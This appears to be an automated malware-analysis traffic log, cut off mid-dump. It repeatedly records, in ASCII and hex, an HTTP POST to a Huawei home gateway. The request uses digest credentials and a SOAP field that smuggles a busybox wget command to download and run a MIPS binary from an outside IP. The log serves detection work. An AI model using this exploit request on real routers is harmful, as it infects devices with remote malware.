70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 